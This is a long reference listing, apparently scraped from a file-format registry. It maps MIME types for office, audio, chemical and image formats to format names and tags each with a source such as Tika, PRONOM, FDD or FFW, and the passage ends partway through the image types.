PPTX Transitional (Office Open XML), ISO 29500:2008-2016, ECMA-376, Editions 1-5 fdd
— — —  application/vnd.openxmlformats-officedocument.presentationml.presentation; version=”2007 onwards”Microsoft Powerpoint for Windows 2007 onwards pronom
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— —  application/vnd.openxmlformats-officedocument.presentationml.slideshowMicrosoft PowerPoint ffw
Office Open XML Presentation Slideshow tika
PPTX Transitional (Office Open XML), ISO 29500:2008-2016, ECMA-376, Editions 1-5 fdd
— — —  application/vnd.openxmlformats-officedocument.presentationml.slideshow; version=”2007″Microsoft PowerPoint Show 2007 pronom
— —  application/vnd.openxmlformats-officedocument.presentationml.templateMicrosoft PowerPoint ffw
Office Open XML Presentation Template tika
— — —  application/vnd.openxmlformats-officedocument.presentationml.template; version=”2007″Microsoft PowerPoint Template 2007 pronom
— —  application/vnd.openxmlformats-officedocument.spreadsheetml.sheetXLSX ffw
Microsoft Excel ffw
Office Open XML Workbook tika
XLSX Transitional (Office Open XML), ISO 29500:2008-2016, ECMA-376, Editions 1-5 fdd
XLSX Strict (Office Open XML), ISO 29500-1:2008-2016 fdd
— — —  application/vnd.openxmlformats-officedocument.spreadsheetml.sheet; version=”2007 onwards”Microsoft Excel for Windows 2007 onwards pronom
— —  application/vnd.openxmlformats-officedocument.spreadsheetml.templateMicrosoft Excel ffw
Office Open XML Workbook Template tika
— — —  application/vnd.openxmlformats-officedocument.spreadsheetml.template; version=”2007 onwards”Microsoft Excel Template 2007 onwards pronom
— —  application/vnd.openxmlformats-officedocument.wordprocessingml.documentDOCX ffw
Microsoft Word ffw
Office Open XML Document tika
OOXML Format Family — ISO/IEC 29500 and ECMA 376 fdd
DOCX Transitional (Office Open XML), ISO 29500:2008-2016, ECMA-376, Editions 1-5 fdd
DOCX Strict (Office Open XML), ISO 29500-1: 2008-2016 fdd
— — —  application/vnd.openxmlformats-officedocument.wordprocessingml.document; version=”2007 onwards”Microsoft Word for Windows 2007 onwards pronom
— —  application/vnd.openxmlformats-officedocument.wordprocessingml.templateMicrosoft Word ffw
Office Open XML Document Template tika
— — —  application/vnd.openxmlformats-officedocument.wordprocessingml.template; version=”2007 onwards”Microsoft Word Template 2007 onwards pronom
— —  application/x-tika-ooxml-protectedPassword Protected OOXML File tika
— —  application/x-tika-visio-ooxmlVisio OOXML File tika
— — —  application/ Open XML Visio Drawing (macro-free) tika
Visio VSDX Drawing File Format fdd
Visio VSDX Drawing File Format fdd
— — —  application/ Open XML Visio Drawing (macro-enabled) tika
— — —  application/ Open XML Visio Stencil (macro-free) tika
— — —  application/ Open XML Visio Stencil (macro-enabled) tika
— — —  application/ Open XML Visio Template (macro-free) tika
— — —  application/ Open XML Visio Template (macro-enabled) tika
— —  model/vnd.dwfx+xpsAutoCAD Design Web Format tika
—  application/x-vnd.oasis.opendocument.formulaOpenDocument v1.0: Formula document tika
—  application/x-xmindXMind Pro tika
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application/zstdZstandard ffw
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audio/3gpp3GP ffw
audio/3gpp tika
3GPP Audio/Video File pronom
AMR, Adaptive Multi-Rate Speech Codec fdd
audio/3gpp23G2 ffw
audio/3gpp2 tika
audio/8svx8-Bit Sampled Voice ffw
audio/ac3audio/ac3 tika
Dolby Digital AC-3 pronom
AC-3 Compressed Audio (Dolby Digital), Revision A fdd
audio/adpcmaudio/adpcm tika
audio/aiffAIFF ffw
Audio Interchange File Format tika
AIFF (Audio Interchange File Format) fdd
AIFF File Format with LPCM Audio fdd
audio/amrAdaptive Multi-Rate Audio ffw
audio/amr tika
Adaptive Multi-Rate Audio pronom
AMR, Adaptive Multi-Rate Speech Codec fdd
—  audio/amr-wbaudio/amr-wb tika
Adaptive Multi-Rate Wideband Audio pronom
AMR-WB, Adaptive Multi-Rate – Wideband Speech Codec fdd
—  audio/amr-wb+audio/amr-wb+ tika
AMR-WB+, Extended Adaptive Multi-Rate – Wideband Speech Codec fdd
audio/application/x-pn-realmediaRealMedia ffw
audio/ascaudio/asc tika
audio/asfASF (Advanced Systems Format) fdd
audio/audibleAudible.Com File Format fdd
audio/aviAVI (Audio Video Interleaved) File Format fdd
audio/basicAU ffw
uLaw/AU Audio File tika
NeXT/Sun sound pronom
audio/bv16audio/bv16 tika
audio/bv32audio/bv32 tika
audio/clearmodeaudio/clearmode tika
audio/cnaudio/cn tika
audio/dat12audio/dat12 tika
audio/dlsaudio/dls tika
Downloadable Sounds Audio pronom
audio/dsr-es201108audio/dsr-es201108 tika
audio/dsr-es202050audio/dsr-es202050 tika
audio/dsr-es202211audio/dsr-es202211 tika
audio/dsr-es202212audio/dsr-es202212 tika
audio/dvi4audio/dvi4 tika
audio/eac3audio/eac3 tika
audio/evrcaudio/evrc tika
audio/evrc-qcpaudio/evrc-qcp tika
audio/evrc0audio/evrc0 tika
audio/evrc1audio/evrc1 tika
audio/evrcbaudio/evrcb tika
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audio/evrcwbaudio/evrcwb tika
audio/evrcwb0audio/evrcwb0 tika
audio/evrcwb1audio/evrcwb1 tika
audio/exampleaudio/example tika
audio/flacFLAC ffw
FLAC (Free Lossless Audio Codec), Version 1.1.2 fdd
audio/g719audio/g719 tika
audio/g722audio/g722 tika
audio/g7221audio/g7221 tika
audio/g723audio/g723 tika
audio/g726-16audio/g726-16 tika
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audio/g726-32audio/g726-32 tika
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audio/g728audio/g728 tika
audio/g729audio/g729 tika
audio/g7291audio/g7291 tika
audio/g729daudio/g729d tika
audio/g729eaudio/g729e tika
audio/gsmaudio/gsm tika
audio/gsm-efraudio/gsm-efr tika
audio/ilbcaudio/ilbc tika
audio/itModule Music Formats (Mods) fdd
audio/l16audio/l16 tika
audio/l20audio/l20 tika
audio/l24audio/l24 tika
audio/l8audio/l8 tika
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audio/mMIDI ffw
audio/mStandard MIDI File Format fdd
audio/medModule Music Formats (Mods) fdd
audio/midMIDI ffw
Standard MIDI File Format fdd
RIFF-based MIDI File Format fdd
audio/midiMIDI ffw
Musical Instrument Digital Interface tika
MIDI Audio pronom
audio/midiStandard MIDI File Format fdd
audio/mobile-xmfaudio/mobile-xmf tika
Mobile eXtensible Music Format pronom
XMF, eXtensible Music File Format, Version 1.0 fdd
audio/modModule Music Formats (Mods) fdd
audio/mp3MP3 File Format fdd
audio/mp4MP4 ffw
audio/mp4 tika
MPEG-4 File Format, Version 2 fdd
audio/mp4a-latmaudio/mp4a-latm tika
audio/mpaMPEG Audio Layer I ffw
MPEG Audio Layer II ffw
audio/mpa tika
MPEG-1 and MPEG-2 Layer II Audio Encoding fdd
audio/mpa-robustaudio/mpa-robust tika
audio/mpegMP3 ffw
MPEG-1 ffw
MPEG Audio Layer I ffw
MPEG Audio Layer II ffw
MPEG-1 Audio Layer 3 tika
MPEG 1/2 Audio Layer 3 Streaming pronom
MPEG 1/2 Audio Layer 3 pronom
MPEG Audio Stream, Layer II pronom
MPEG 1/2 Audio Layer I pronom
DTB (Digital Talking Book), 2005 fdd
MPEG-1 and MPEG-2 Layer II Audio Encoding fdd
MP3 File Format fdd
audio/mpeg3MP3 File Format fdd
audio/mpeg4-genericaudio/mpeg4-generic tika
DTB (Digital Talking Book), 2005 fdd
audio/mpgMP3 File Format fdd
audio/ogg; codecs=speexSpeex Audio Codec, Version 1.2 fdd
Ogg Speex Audio Format fdd
audio/parityfecaudio/parityfec tika
audio/pcmaaudio/pcma tika
audio/pcma-wbaudio/pcma-wb tika
audio/pcmuaudio/pcmu tika
audio/pcmu-wbaudio/pcmu-wb tika
audio/prs.sidSID ffw
audio/prs.sid tika
Real SID Audio pronom
—  audio/prs.sid; version=”1″Play SID Audio 1 pronom
—  audio/prs.sid; version=”2″Play SID Audio 2 pronom
audio/qcelpaudio/qcelp tika
QCP Audio File Format pronom
audio/redaudio/red tika
audio/rtp-enc-aescm128audio/rtp-enc-aescm128 tika
audio/rtp-midiaudio/rtp-midi tika
audio/rtxaudio/rtx tika
audio/s3mModule Music Formats (Mods) fdd
audio/smvaudio/smv tika
audio/smv-qcpaudio/smv-qcp tika
audio/smv0audio/smv0 tika
audio/sp-midiaudio/sp-midi tika
audio/t140caudio/t140c tika
audio/t38audio/t38 tika
audio/telephone-eventaudio/telephone-event tika
audio/toneaudio/tone tika
audio/tta; version=”1″True Audio 1 pronom
audio/tta; version=”2″True Audio 2 pronom
audio/ulpfecaudio/ulpfec tika
audio/vdviaudio/vdvi tika
audio/vmr-wbaudio/vmr-wb tika
audio/vnd.3gpp.iufpaudio/vnd.3gpp.iufp tika
audio/vnd.4sbaudio/vnd.4sb tika
audio/vnd.adobe.soundboothaudio/vnd.adobe.soundbooth tika
audio/vnd.audiokozaudio/vnd.audiokoz tika
audio/vnd.celpaudio/vnd.celp tika
audio/ tika
audio/ tika
audio/vnd.cns.anp1audio/vnd.cns.anp1 tika
audio/vnd.cns.inf1audio/vnd.cns.inf1 tika
audio/ tika
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audio/vnd.dolby.heaac.2audio/vnd.dolby.heaac.2 tika
audio/vnd.dolby.mlpaudio/vnd.dolby.mlp tika
Dolby MLP Lossless Audio pronom
audio/vnd.dolby.mpsaudio/vnd.dolby.mps tika
audio/vnd.dolby.pl2audio/vnd.dolby.pl2 tika
audio/vnd.dolby.pl2xaudio/vnd.dolby.pl2x tika
audio/vnd.dolby.pl2zaudio/vnd.dolby.pl2z tika
audio/vnd.dtsaudio/vnd.dts tika
DTS Coherent Acoustics (DCA) Audio pronom
audio/vnd.dts.hdaudio/vnd.dts.hd tika
audio/vnd.everad.pljaudio/vnd.everad.plj tika
audio/vnd.hns.audioaudio/ tika
audio/vnd.lucent.voiceaudio/vnd.lucent.voice tika
audio/ tika
audio/ tika
audio/vnd.nortel.vbkaudio/vnd.nortel.vbk tika
audio/vnd.nuera.ecelp4800audio/vnd.nuera.ecelp4800 tika
audio/vnd.nuera.ecelp7470audio/vnd.nuera.ecelp7470 tika
audio/vnd.nuera.ecelp9600audio/vnd.nuera.ecelp9600 tika
audio/vnd.octel.sbcaudio/vnd.octel.sbc tika
audio/vnd.qcelpaudio/vnd.qcelp tika
audio/vnd.rhetorex.32kadpcmaudio/vnd.rhetorex.32kadpcm tika
audio/vnd.rn-realaudioRealAudio ffw
RealAudio Metafile pronom
RealAudio, Version 10 fdd
—  audio/vnd.rn-realaudio; version=”3″RealAudio 3 pronom
audio/vnd.sealedmedia.softseal.mpegaudio/vnd.sealedmedia.softseal.mpeg tika
audio/vnd.vmx.cvsdaudio/vnd.vmx.cvsd tika
audio/vnd.waveWAV ffw
WAVE Audio File Format fdd
audio/vorbis-configaudio/vorbis-config tika
audio/wavWAV ffw
WAVE Audio File Format fdd
audio/waveWAV ffw
WAVE Audio File Format fdd
audio/webmWebM ffw
WebM fdd
audio/x-8svx8-Bit Sampled Voice ffw
audio/x-aacaudio/x-aac tika
audio/x-adbcmaudio/x-adbcm tika
audio/x-aiffAIFF ffw
Audio Interchange File Format tika
Audio Interchange File Format (compressed) pronom
AIFF (Audio Interchange File Format) fdd
AIFF File Format with LPCM Audio fdd
audio/x-amr-wbAdaptive Multi-Rate WideBand Audio ffw
audio/x-dec-adbcmaudio/x-dec-adbcm tika
audio/x-dec-basicaudio/x-dec-basic tika
audio/x-flacFLAC ffw
Free Lossless Audio Codec tika
audio/x-m4aaudio/mp4 tika
audio/x-matroskaMatroska Multimedia Container fdd
Matroska Multimedia Container fdd
audio/x-midiMIDI ffw
audio/x-midiStandard MIDI File Format fdd
audio/x-modEPSGMOD ffw
audio/x-mod tika
Module Music Formats (Mods) fdd
audio/x-mp3MP3 File Format fdd
audio/x-mp4aaudio/mp4 tika
audio/x-mpegMPEG-1 Audio Layer 3 tika
MP3 File Format fdd
audio/x-mpeg3MP3 File Format fdd
audio/x-mpegaudioMP3 File Format fdd
audio/x-mpegurlMP3 Playlist File tika
audio/x-mpgMP3 File Format fdd
audio/x-ms-waxWindows Media Metafile ffw
audio/x-ms-wax tika
audio/x-oggOgg File Format fdd
Ogg Vorbis Audio Format fdd
audio/x-pn-audibleaudioAudible.Com File Format fdd
audio/x-pn-realaudioRealAudio ffw
RAM (RealAudio) ffw
Real Audio tika
RealAudio Metafile pronom
audio/x-pn-realaudio-pluginRAM (RealAudio) ffw
RealMedia Player Plug-in tika
audio/x-pn-wavWAV ffw
WAVE Audio File Format fdd
audio/x-realaudioReal Audio tika
audio/x-s3mModule Music Formats (Mods) fdd
audio/x-speexSpeex Audio Codec, Version 1.2 fdd
Ogg Speex Audio Format fdd
audio/x-vocCreative Voice File ffw
audio/x-wavWAV ffw
BWF ffw
audio/x-wav tika
Waveform Audio pronom
Waveform Audio (PCMWAVEFORMAT) pronom
Waveform Audio (WAVEFORMATEX) pronom
Waveform Audio (WAVEFORMATEXTENSIBLE) pronom
WAVE Audio File Format fdd
DTB (Digital Talking Book), 2005 fdd
—  audio/x-wav; version=”0 generic”Broadcast WAVE 0 Generic pronom
—  audio/x-wav; version=”0 mpeg encoding”Broadcast WAVE 0 MPEG Encoding pronom
—  audio/x-wav; version=”0 pcm encoding”Broadcast WAVE 0 PCM Encoding pronom
—  audio/x-wav; version=”0 waveformatextensible encoding”Broadcast WAVE 0 WAVEFORMATEXTENSIBLE Encoding pronom
—  audio/x-wav; version=”1 generic”Broadcast WAVE 1 Generic pronom
—  audio/x-wav; version=”1 mpeg encoding”Broadcast WAVE 1 MPEG Encoding pronom
—  audio/x-wav; version=”1 pcm encoding”Broadcast WAVE 1 PCM Encoding pronom
—  audio/x-wav; version=”1 waveformatextensible encoding”Broadcast WAVE 1 WAVEFORMATEXTENSIBLE Encoding pronom
—  audio/x-wav; version=”2 generic”Broadcast WAVE 2 Generic pronom
—  audio/x-wav; version=”2 mpeg encoding”Broadcast WAVE 2 MPEG Encoding pronom
—  audio/x-wav; version=”2 pcm encoding”Broadcast WAVE 2 PCM Encoding pronom
—  audio/x-wav; version=”2 waveformatextensible encoding”Broadcast WAVE 2 WAVEFORMATEXTENSIBLE Encoding pronom
—  audio/x-wav; version=”2.0″Exchangeable Image File Format (Audio) 2.0 pronom
—  audio/x-wav; version=”2.1″Exchangeable Image File Format (Audio) 2.1 pronom
—  audio/x-wav; version=”2.2″Exchangeable Image File Format (Audio) 2.2 pronom
audio/x-xmModule Music Formats (Mods) fdd
audio/xmExtended Module Audio File pronom
Module Music Formats (Mods) fdd
chemical/x-cdxchemical/x-cdx tika
Chemical Draw Exchange Format pronom
chemical/x-cifCIF ffw
chemical/x-cif tika
chemical/x-cmdfchemical/x-cmdf tika
chemical/x-cmlCML ffw
chemical/x-cml tika
chemical/x-csmlchemical/x-csml tika
chemical/x-mdl-molfileMOL ffw
chemical/x-pdbBrookhaven Protein Databank File tika
chemical/x-xyzchemical/x-xyz tika
drawing/dwgDWG ffw
AutoCad Drawing tika
gzip/documentGzip Compressed Archive tika
image/ascii-artASCII Art ffw
image/aviAVI (Audio Video Interleaved) File Format fdd
image/avifAVIF ffw
image/avif-sequenceAVIF ffw
image/bmpBMP ffw
Windows bitmap tika
Bitmap Image File (BMP), Version 5 fdd
—  image/bmp; version=”1.0″Windows Bitmap 1.0 pronom
—  image/bmp; version=”2.0″OS/2 Bitmap 2.0 pronom
Windows Bitmap 2.0 pronom
—  image/bmp; version=”3.0 nt”Windows Bitmap 3.0 NT pronom
—  image/bmp; version=”3.0″Windows Bitmap 3.0 pronom
—  image/bmp; version=”4.0″Windows Bitmap 4.0 pronom
—  image/bmp; version=”5.0″Windows Bitmap 5.0 pronom
image/cgmCGM ffw
Computer Graphics Metafile tika
Computer Graphics Metafile (CGM) File Format Family fdd
—  image/cgm; version=”1″Computer Graphics Metafile ASCII 1 pronom
—  image/cgm; version=”3″Computer Graphics Metafile ASCII 3 pronom
—  image/cgm; version=”4″Computer Graphics Metafile ASCII 4 pronom
—  image/cgm; version=1; version=”1″Computer Graphics Metafile (Binary) 1 pronom
—  image/cgm; version=2; version=”2″Computer Graphics Metafile (Binary) 2 pronom
—  image/cgm; version=3; version=”3″Computer Graphics Metafile (Binary) 3 pronom
—  image/cgm; version=4; version=”4″Computer Graphics Metafile (Binary) 4 pronom
image/cis-codLightning Strike ffw
image/dicom-rleDICOM ffw
image/emfEnhanced Metafile ffw
—  image/emf; version=”1.0″Microsoft Windows Enhanced Metafile 1.0 pronom
—  image/emf; version=”2.0″Microsoft Windows Enhanced Metafile 2.0 pronom
—  image/emf; version=”3.0″Microsoft Windows Enhanced Metafile 3.0 pronom
image/exampleimage/example tika
image/flifFree Lossless Image Format (FLIF) pronom
image/g3faxCCITT Group 3 ffw
image/g3fax tika
image/gifGIF ffw
Graphics Interchange Format tika
GIF Graphics Interchange Format, Version 89a fdd
—  image/gif; version=”87a”Graphics Interchange Format 87a pronom
—  image/gif; version=”89a”Graphics Interchange Format 89a pronom
image/heicHEIF ffw
High Efficiency Image File Format, HEIC/HEIX brands fdd
High Efficiency Image File (HEIF) Format, MPEG-H Part 12 fdd
image/heic-sequenceHigh Efficiency Image File Format, HEIC/HEIX brands fdd
image/heifHEIF ffw
High Efficiency Image File (HEIF) Format, MPEG-H Part 12 fdd
image/iefImage Exchange Format ffw
image/ief tika
image/image/x-ptxPentax PEF ffw
image/ivgIconVG ffw
image/jlsJPEG-LS ffw
image/jpegJPEG ffw
JFIF ffw
Joint Photographic Experts Group tika
Raw JPEG Stream pronom
JFIF, JPEG File Interchange Format, Version 1.02 fdd
SPIFF, Still Picture Interchange File Format fdd
—  image/jpeg; version=”1.0″Still Picture Interchange File Format 1.0 pronom
—  image/jpeg; version=”1.00″JPEG File Interchange Format 1.00 pronom
—  image/jpeg; version=”1.01″JPEG File Interchange Format 1.01 pronom
—  image/jpeg; version=”1.02″JPEG File Interchange Format 1.02 pronom
—  image/jpeg; version=”2.0″Still Picture Interchange File Format 2.0 pronom
Exchangeable Image File Format (Compressed) 2.0 pronom
—  image/jpeg; version=”2.1″Exchangeable Image File Format (Compressed) 2.1 pronom
—  image/jpeg; version=”2.2″Exchangeable Image File Format (Compressed) 2.2 pronom
—  image/jpeg; version=”2.2.1″Exchangeable Image File Format (Compressed) 2.2.1 pronom
image/jpeg2000JPEG 2000 Part 1 (Core) jp2 File Format fdd
image/jpeg2000-imageJPEG 2000 Part 1 (Core) jp2 File Format fdd
image/jpgJFIF, JPEG File Interchange Format, Version 1.02 fdd
image/jxlJPEG XL ffw
image/jxrJPEG Extended Range pronom
JPEG XR File Format (JXR) fdd
image/ktxKTX ffw
Khronos Texture File pronom
image/movQuickTime File Format fdd
image/naplpsNAPLPS ffw
image/naplps tika
image/niaNaïve Image Formats ffw
image/nieNaïve Image Formats ffw
image/niiNaïve Image Formats ffw
image/nitfimage/nitf tika
image/ntfimage/nitf tika
image/openrasterOpenRaster ffw
OpenRaster Image Format pronom
image/pictPICT ffw
image/pngPNG ffw
APNG ffw
Portable Network Graphics tika
PNG, Portable Network Graphics fdd
—  image/png; version=”1.0″Portable Network Graphics 1.0 pronom
—  image/png; version=”1.1″Portable Network Graphics 1.1 pronom
—  image/png; version=”1.2″Portable Network Graphics 1.2 pronom
image/png+jsonPiskel canvas ffw
image/prs.btifimage/prs.btif tika
image/prs.ptiimage/prs.pti tika
image/pwg-rasterPWG Raster ffw
image/svg-xmlScalable Vector Graphics (SVG) File Format Family fdd
Scalable Vector Graphics (SVG), Version 1.1 fdd
image/t38image/t38 tika
image/tifTIFF, Revision 6.0 fdd
image/tiffTIFF ffw
Tagged Image File Format tika
Tagged Image File Format for Image Technology (TIFF/IT) pronom
Tagged Image File Format for Electronic Photography (TIFF/EP) pronom
Geographic Tagged Image File Format (GeoTIFF) pronom
Tagged Image File Format for Internet Fax (TIFF-FX) pronom
Tagged Image File Format pronom
TIFF Uncompressed File with Exif Metadata fdd
Digital Raster Graphic as TIFF fdd
Adobe Digital Negative (DNG), Version 1.1 fdd
BigTIFF fdd
GeoTIFF, Revision 1.0 fdd
TIFF, Revision 6.0 fdd
—  image/tiff; version=”1.0″Digital Negative Format (DNG) 1.0 pronom
—  image/tiff; version=”1.1″Digital Negative Format (DNG) 1.1 pronom
—  image/tiff; version=”1.3″Digital Negative Format (DNG) 1.3 pronom
—  image/tiff; version=”1.4″Digital Negative Format (DNG) 1.4 pronom
—  image/tiff; version=”2.0″Exchangeable Image File Format (Uncompressed) 2.0 pronom
—  image/tiff; version=”2.1″Exchangeable Image File Format (Uncompressed) 2.1 pronom
—  image/tiff; version=”2.2″Exchangeable Image File Format (Uncompressed) 2.2 pronom
image/tiff-fxTIFF-FX ffw
image/tiff-fx tika
image/vnd-svf; version=”1″Simple Vector Format 1 pronom
image/vnd-svf; version=”2″Simple Vector Format 2 pronom
image/vnd-wap-wbmpWireless Bitmap pronom
image/vnd.adobe.photoshopPSD ffw
Photoshop Image tika
Adobe Photoshop pronom
Adobe Photoshop Large Document Format pronom
Adobe Photoshop Family fdd
Adobe Photoshop Family fdd
image/vnd.cns.inf2image/vnd.cns.inf2 tika
image/vnd.djvuDjVu ffw
image/vnd.djvu tika
DjVu File Format pronom
Secure DjVU pronom
image/vnd.dwgDWG ffw
AutoCad Drawing tika
DWG (AutoCAD Drawing) Format Family fdd
—  image/vnd.dwg; version=”1.0″AutoCAD Drawing 1.0 pronom
—  image/vnd.dwg; version=”1.2″AutoCAD Drawing 1.2 pronom
—  image/vnd.dwg; version=”1.3″AutoCAD Drawing 1.3 pronom
—  image/vnd.dwg; version=”1.4″AutoCAD Drawing 1.4 pronom
—  image/vnd.dwg; version=”2.0″AutoCAD Drawing 2.0 pronom
—  image/vnd.dwg; version=”2.1″AutoCAD Drawing 2.1 pronom
—  image/vnd.dwg; version=”2.2″AutoCAD Drawing 2.2 pronom
—  image/vnd.dwg; version=”2.5″AutoCAD Drawing 2.5 pronom
—  image/vnd.dwg; version=”2.6″AutoCAD Drawing 2.6 pronom
—  image/vnd.dwg; version=”2000-2002″AutoCAD Drawing 2000-2002 pronom
—  image/vnd.dwg; version=”2004-2005″AutoCAD Drawing 2004-2005 pronom
—  image/vnd.dwg; version=”2007-2008″AutoCAD Drawing 2007-2008 pronom
—  image/vnd.dwg; version=”2010/2011/2012″AutoCAD Drawing 2010/2011/2012 pronom
—  image/vnd.dwg; version=”2013/2014″AutoCAD Drawing 2013/2014 pronom
—  image/vnd.dwg; version=”r10″AutoCAD Drawing R10 pronom
—  image/vnd.dwg; version=”r11/12″AutoCAD Drawing R11/12 pronom
—  image/vnd.dwg; version=”r13″AutoCAD Drawing R13 pronom
—  image/vnd.dwg; version=”r14″AutoCAD Drawing R14 pronom
—  image/vnd.dwg; version=”r9″AutoCAD Drawing R9 pronom
image/vnd.dxbAutoCAD DXF simplified Binary tika
image/vnd.dxfDXF ffw
AutoCAD DXF tika
DXF (AutoCAD Drawing Interchange Format) Family, ASCII variant fdd
—  image/vnd.dxf; version=”1.0″Drawing Interchange File Format (ASCII) 1.0 pronom
—  image/vnd.dxf; version=”1.2″Drawing Interchange File Format (ASCII) 1.2 pronom
—  image/vnd.dxf; version=”1.3″Drawing Interchange File Format (ASCII) 1.3 pronom
—  image/vnd.dxf; version=”1.4″Drawing Interchange File Format (ASCII) 1.4 pronom
—  image/vnd.dxf; version=”2.0″Drawing Interchange File Format (ASCII) 2.0 pronom
—  image/vnd.dxf; version=”2.1″Drawing Interchange File Format (ASCII) 2.1 pronom
—  image/vnd.dxf; version=”2.2″Drawing Interchange File Format (ASCII) 2.2 pronom
—  image/vnd.dxf; version=”2.5″Drawing Interchange File Format (ASCII) 2.5 pronom
—  image/vnd.dxf; version=”2.6″Drawing Interchange File Format (ASCII) 2.6 pronom
—  image/vnd.dxf; version=”2000-2002″Drawing Interchange File Format (ASCII) 2000-2002 pronom
Drawing Interchange File Format (Binary) 2000-2002 pronom
—  image/vnd.dxf; version=”2004-2005″Drawing Interchange File Format (Binary) 2004-2005 pronom
—  image/vnd.dxf; version=”2004/2005/2006″Drawing Interchange File Format (ASCII) 2004/2005/2006 pronom
—  image/vnd.dxf; version=”2007/2008/2009″Drawing Interchange File Format (ASCII) 2007/2008/2009 pronom
—  image/vnd.dxf; version=”2010/2011/2012″Drawing Interchange File Format (ASCII) 2010/2011/2012 pronom
—  image/vnd.dxf; version=”2013/2014″Drawing Interchange File Format (ASCII) 2013/2014 pronom
—  image/vnd.dxf; version=”generic”Drawing Interchange File Format (ASCII) Generic pronom
—  image/vnd.dxf; version=”r10″Drawing Interchange File Format (ASCII) R10 pronom
Drawing Interchange File Format (Binary) R10 pronom
—  image/vnd.dxf; version=”r11/12″Drawing Interchange File Format (ASCII) R11/12 pronom
Drawing Interchange File Format (Binary) R11/12 pronom
—  image/vnd.dxf; version=”r13″Drawing Interchange File Format (ASCII) R13 pronom
Drawing Interchange File Format (Binary) R13 pronom
—  image/vnd.dxf; version=”r14″Drawing Interchange File Format (ASCII) R14 pronom
Drawing Interchange File Format (Binary) R14 pronom
—  image/vnd.dxf; version=”r9″Drawing Interchange File Format (ASCII) R9 pronom
—  image/vnd.dxf;format=asciiAutoCAD DXF in ASCII Text form tika
—  image/vnd.dxf;format=binaryAutoCAD DXF in Binary form tika
image/vnd.fastbidsheetimage/vnd.fastbidsheet tika
image/vnd.fpxFlashPix ffw
image/vnd.fpx tika
Kodak FlashPix Image pronom
image/vnd.fstimage/vnd.fst tika
image/ EDMICS-MMR ffw
image/ tika
image/ EDMICS-RLC ffw
image/ tika
image/vnd.globalgraphics.pgbimage/vnd.globalgraphics.pgb tika
image/ ffw
image/ tika
Icon file format pronom
image/vnd.mixMIX (Picture It!) ffw
MIX (PhotoDraw) ffw
image/vnd.mix tika
—  image/vnd.mix; version=”1″Microsoft Picture It! Image File 1 pronom
—  image/vnd.mix; version=”1.0″Microsoft PhotoDraw 1.0 pronom
image/vnd.mozilla.apngAPNG ffw
Animated Portable Network Graphics pronom
image/ ffw
Microsoft Document Imaging tika
Microsoft Document Imaging File Format pronom
image/ XR ffw
HD Photo, Version 1.0 (Windows Media Photo) fdd
JPEG XR File Format (JXR) fdd
image/ tika
image/vnd.radianceRadiance HDR ffw
image/vnd.radiance tika
Radiance RGBE Image Format pronom
image/vnd.rn-realflashMacromedia Flash SWF File Format, Version 7 fdd
Macromedia Flash SWF File Format, Version 8 fdd
image/vnd.sealed.pngimage/vnd.sealed.png tika
image/vnd.sealedmedia.softseal.gifimage/vnd.sealedmedia.softseal.gif tika
image/vnd.sealedmedia.softseal.jpgimage/vnd.sealedmedia.softseal.jpg tika
image/vnd.svfSimple Vector Format ffw
image/vnd.svf tika
image/vnd.tencent.tapTAP (Tencent) ffw
image/vnd.valve.source.textureValve Texture Format ffw
Valve Texture Format pronom
image/vnd.wap.wbmpWBMP ffw
Wireless Bitmap File Format tika
image/vnd.xiffXIFF ffw
image/vnd.xiff tika
image/vnd.zbrush.pcxPCX ffw
—  image/vnd.zbrush.pcx; version=”0″PCX 0 pronom
—  image/vnd.zbrush.pcx; version=”2″PCX 2 pronom
—  image/vnd.zbrush.pcx; version=”3″PCX 3 pronom
—  image/vnd.zbrush.pcx; version=”4″PCX 4 pronom
—  image/vnd.zbrush.pcx; version=”5″PCX 5 pronom
image/vpbQuantel VPB image ffw
image/webpWebP ffw
image/webp tika
image/wmfWindows Metafile ffw
Windows Metafile Image pronom
image/x-3ds3DS ffw
image/x-bmpBitmap Image File (BMP), Version 5 fdd
image/x-bpgBetter Portable Graphics tika
image/x-canon-cr3Canon RAW 3 ffw
image/x-canon-crwCamera Image File Format ffw
image/x-cmu-rasterimage/x-cmu-raster tika
image/x-cmximage/x-cmx tika
image/x-dcxMultipage Zsoft Paintbrush Bitmap Graphics pronom
image/x-djvuDjVu File Format pronom
Secure DjVU pronom
image/x-dpxDigital Moving-Picture Exchange (DPX), Version 2.0 fdd
Digital Moving-Picture Exchange (DPX), Version 2.0 fdd
image/x-dwgDWG ffw
AutoCad Drawing tika
image/x-exr; version=”2″OpenEXR 2 pronom
image/x-freehandFreeHand image tika
image/x-hasselblad-3frHasselblad 3FR ffw
image/x-iconICO ffw
Favicon ffw
image/ tika
Icon file format pronom
image/x-jngJPEG Network Graphics pronom
image/x-jp2-codestreamJPEG 2000 Codestream tika
image/x-jp2-containerJPEG 2000 Container Format tika
—  image/jp2JP2 ffw
JPEG 2000 ffw
GeoJP2 ffw
JPEG 2000 Part 1 (JP2) tika
JP2 (JPEG 2000 part 1) pronom
JPEG 2000 Part 1 (Core) jp2 File Format fdd
—  image/jpmJPM ffw
JPEG 2000 ffw
JPEG 2000 Part 6 (JPM) tika
JPM (JPEG 2000 part 6) pronom
JPEG 2000 Part 6 (Compound) jpm File Format fdd
—  image/jpxJPX ffw
JPEG 2000 ffw
GMLJP2 ffw
JPEG 2000 Part 2 (JPX) tika
JPX (JPEG 2000 part 2) pronom
JPEG 2000 Part 2 (Extensions) jpf (jpx) File Format fdd
—  video/jpmJPEG 2000 Part 6 (JPM) tika
—  video/mj2MJ2 ffw
JPEG 2000 ffw
JPEG 2000 Part 3 (Motion JPEG, MJ2) tika
MJ2 (Motion JPEG 2000) pronom
Motion JPEG 2000 File Format fdd
image/x-jpeg2000-imageJPEG 2000 Part 1 (Core) jp2 File Format fdd
image/x-mrsidMrSID ffw
image/x-mrsid-imageMrSID Image Format, Generation 3 fdd
MrSID Image Format, Generation 2 fdd
image/x-ms-bmpWindows bitmap tika
Bitmap Image File (BMP), Version 5 fdd
image/x-niffNavy Interchange File Format tika
image/x-pcxPCX ffw
image/x-pcx tika
image/x-pentax-pefPentax PEF ffw
image/x-pictPICT ffw
Apple Macintosh QuickDraw/PICT Format tika
—  image/x-pict; version=”1.0″Macintosh PICT Image 1.0 pronom
—  image/x-pict; version=”2.0″Macintosh PICT Image 2.0 pronom
image/x-portable-anymapNetpbm formats ffw
Netpbm formats ffw
Portable Any Map tika
—  image/x-portable-bitmapNetpbm formats ffw
Portable Bit Map tika
Portable Bitmap Image – ASCII pronom
—  image/x-portable-graymapNetpbm formats ffw
